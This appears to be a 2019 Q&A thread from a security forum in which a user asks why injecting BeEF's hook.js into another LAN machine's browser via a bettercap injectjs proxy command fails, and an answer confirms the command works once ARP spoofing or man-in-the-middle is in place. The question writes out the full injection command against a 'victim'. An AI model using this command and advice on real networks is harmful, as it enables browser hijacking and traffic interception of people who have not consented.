1

I am trying to inject beef's hook.js in browser on another pc on my local network.

After starting beef and login to the UI I started bettercap in terminal and executed the following command:

sudo bettercap --proxy-module injectjs --js-url "http://192.168.43.141:3000/hook.js"

After that I'm getting results from bettercap about browsing on the targeted pc but beef doesn't show anything in the user panel (no hooked browsers) ....any idea?

Update from comment:

So I've installed newer version of bettercap and it's all the same...I can sniff the traffic from the IP but I can't hook with beef....I'm open to other suggestions instead of beef and bettercap as well....

Soufiane Tahiri
  • 2,667
  • 12
  • 27
htopalov
  • 11
  • 2
  • This is a troubleshooting scenario. The next step is to run packet captures. – schroeder Mar 05 '19 at 20:43
  • Can you explain more – htopalov Mar 05 '19 at 20:47
  • 2
    This is a troubleshooting situation. You need to confirm each step of the way. You need to confirm that the target machine is actually sending http traffic to your machine. Then you need to confirm that the beef site is running and that your local machine can hit it and it gets logged, etc. – schroeder Mar 05 '19 at 21:31
  • As I said I receive http traffic in bettercap and beef is running but nothing show up in its panel. I think there is a problem with the connection between bettercap and beef itself( or bettercap just sniffs http but doesn't inject hook script). Is there any troubleshooting guide or tutorial – htopalov Mar 06 '19 at 05:01

1 Answers1

0

It should work if you have already done the MitM (Man in the middle) or if you are doing ARP spoofing. I think because of your comments that you already have it done because you are watching victim's packages. The nomenclature you are using for BeEF injection is ok if your attacking pc has the right ip 192.168.43.141 and your BeEF is up and running and is accessible by the victim.

Based on your command line I see that you are using Bettercap 1.x . Bettercap 2.x is quite different and configuration is very different than this. Anyway, Bettercap 1.x works like a charm (better than 2.x in my opinion).

In order to "hook" the victim, the victim should surf through some web pages. This is not perfect, sometimes the victim is hooked and other times it is not for unknown reason. BeEF is a experimental stuff, but it works the most of the times. Be patient and try again.

OscarAkaElvis
  • 5,185
  • 3
  • 17
  • 48